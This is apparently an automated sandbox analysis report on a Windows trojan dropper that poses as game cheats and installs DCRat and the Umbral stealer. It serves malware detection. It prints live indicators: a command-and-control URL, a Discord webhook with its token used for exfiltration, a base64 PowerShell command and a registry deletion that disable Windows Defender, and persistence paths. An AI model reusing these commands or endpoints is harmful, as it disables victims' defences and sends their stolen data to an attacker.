Source: FixTsDfhiC.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\blockweb\portrefNet.exe | Directory created: C:\Program Files\Windows Portable Devices\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | Directory created: C:\Program Files\Windows Portable Devices\4811fe426320bd
Source: C:\blockweb\portrefNet.exe | Directory created: C:\Program Files\7-Zip\Lang\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | Directory created: C:\Program Files\7-Zip\Lang\4811fe426320bd
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Lunch LaCheat.exe, 00000022.00000003.1808515940.0000000004F74000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824780821.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1805618598.000000000396E000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1823791845.0000000003966000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1807504603.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1823496476.00000000036D8000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1808928510.0000000005207000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1806529098.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824009704.0000000003BF0000.00000004.00000020.00020000.00000000.sdmp, DCRatBuild.exe, 00000023.00000003.1807258543.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, DCRatBuild.exe, 00000023.00000000.1805391607.0000000000763000.00000002.00000001.01000000.00000008.sdmp, DCRatBuild.exe, 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp, DCRatBuild.exe, 00000023.00000003.1808042217.0000000004E9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: portrefNet.exe, 0000002C.00000002.1947126022.00000000024A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: portrefNet.exe, 0000002C.00000002.1947126022.00000000024A0000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0073A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,35_2_0073A5F4
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0074B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,35_2_0074B8E0
Source: C:\blockweb\portrefNet.exe | File opened: C:\Users\user
Source: C:\blockweb\portrefNet.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\blockweb\portrefNet.exe | File opened: C:\Users\user\AppData
Source: C:\blockweb\portrefNet.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\blockweb\portrefNet.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\blockweb\portrefNet.exe | File opened: C:\Users\user\AppData\Local

Networking

Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49745 -> 92.53.106.114:80
Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49890 -> 92.53.106.114:80
Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:50013 -> 92.53.106.114:80
Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49803 -> 92.53.106.114:80
Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:50016 -> 92.53.106.114:80
Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:50019 -> 92.53.106.114:80
Source: Malware configuration extractor | URLs: http://cp91897.tw1.ru/@=MzY2MWOkV2N
Source: Malware configuration extractor | URLs: https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: 52cheatand52rat.exe, 00000024.00000002.1876249048.00000239D5E8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD56E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gstatic.com
Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5CA000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp | String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD5B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD548000.00000004.00000800.00020000.00000000.sdmp, portrefNet.exe, 0000002C.00000002.1947296388.000000000279D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp | String found in binary or memory: https://discord.com/api/v10/users/
Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD4C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP
Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp | String found in binary or memory: https://discordapp.com/api/v9/users/
Source: 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp | String found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD560000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com
Source: 52cheatand52rat.exe, 00000024.00000002.1874351610.00000239BD4C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com/generate_204
Source: Lunch LaCheat.exe, 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp | String found in binary or memory: https://gstatic.com/generate_204e==================Umbral
Source: reg.exe | Process created: 50

System Summary

Source: 36.0.52cheatand52rat.exe.239bb8d0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 34.3.Lunch LaCheat.exe.1b56998.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 34.2.Lunch LaCheat.exe.1b56998.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: 34.2.Lunch LaCheat.exe.1b56998.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED | Matched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
Source: Lunch LaCheat.exe.1.dr | Static PE information: .vmp0 and .vmp1 section names
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0073718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\AppReadiness\dwm.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\AppReadiness\6cb0b6c459d5d3
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\Performance\WinSAT\DataStore\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\Performance\WinSAT\DataStore\4811fe426320bd
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\INF\.NET Data Provider for Oracle\91e168f4ec1147
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\Setup\State\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | File created: C:\Windows\Setup\State\4811fe426320bd
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0073857B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0073407E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0075D00E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_007470BF
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_00761194
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_007502F6
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0073E2A0
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_00733281
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_00746646
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0075473A
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0075070E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_007327E8
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_007437C1
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0073E8A0
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0073F968
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_00754969
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_00746A7B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_00743A3C
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0075CB60
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_00750B43
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_00745C77
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_00743D6D
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0073ED14
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0074FDFA
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0073DE6C
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0073BE13
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_00750F78
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_00735F3C
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: String function: 0074ED00 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: String function: 0074E360 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: String function: 0074E28C appears 35 times
Source: FixTsDfhiC.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: FixTsDfhiC.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: 36.0.52cheatand52rat.exe.239bb8d0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
Source: 34.3.Lunch LaCheat.exe.1b56998.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
Source: 34.2.Lunch LaCheat.exe.1b56998.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
Source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
Source: 34.2.Lunch LaCheat.exe.1b56998.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, wiSwb7XyiTFNRrZRITR.cs | Cryptographic APIs: 'TransformBlock'
Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, wiSwb7XyiTFNRrZRITR.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ruGDE8wHCs1LugFJYDC.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ruGDE8wHCs1LugFJYDC.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, wiSwb7XyiTFNRrZRITR.cs | Cryptographic APIs: 'TransformBlock'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, wiSwb7XyiTFNRrZRITR.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ruGDE8wHCs1LugFJYDC.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ruGDE8wHCs1LugFJYDC.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, wiSwb7XyiTFNRrZRITR.cs | Cryptographic APIs: 'TransformBlock'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, wiSwb7XyiTFNRrZRITR.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ruGDE8wHCs1LugFJYDC.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ruGDE8wHCs1LugFJYDC.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 52cheatand52rat.exe.34.dr, --------.cs | Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
Source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, --------.cs | Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
Source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, --------.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 34.3.Lunch LaCheat.exe.1b56998.5.raw.unpack, --------.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, bUKS09MsXqrMAhvIgjN.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, bUKS09MsXqrMAhvIgjN.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, bUKS09MsXqrMAhvIgjN.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, bUKS09MsXqrMAhvIgjN.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 52cheatand52rat.exe.34.dr, --------.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 52cheatand52rat.exe.34.dr, --------.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, bUKS09MsXqrMAhvIgjN.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, bUKS09MsXqrMAhvIgjN.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@87/43@1/1
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_00736EC9 GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_00749E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\blockweb\portrefNet.exe | File created: C:\Program Files\Windows Portable Devices\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\52cheatand52rat.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\blockweb\portrefNet.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Mutant created: \Sessions\1\BaseNamedObjects\kwtxO2R822Z9ihsGdQrR
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:824:120:WilError_03
Source: C:\blockweb\portrefNet.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\312f3abf7ba061ec8aad8e8d0a3ae626329305a1
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Users\user\Desktop\FixTsDfhiC.exe | File created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe
Source: C:\Users\user\Desktop\FixTsDfhiC.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs"
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Command line argument: sfxname (35_2_0074D5D4)
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Command line argument: sfxstime (35_2_0074D5D4)
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Command line argument: STARTDLG (35_2_0074D5D4)
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Command line argument: xjx (35_2_0074D5D4)
Source: C:\Users\user\Desktop\FixTsDfhiC.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\blockweb\portrefNet.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\blockweb\portrefNet.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\FixTsDfhiC.exe  File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\FixTsDfhiC.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: FixTsDfhiC.exe  ReversingLabs: Detection: 92%
Source: unknown  Process created: C:\Users\user\Desktop\FixTsDfhiC.exe "C:\Users\user\Desktop\FixTsDfhiC.exe"
Source: C:\Users\user\Desktop\FixTsDfhiC.exe  Process created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
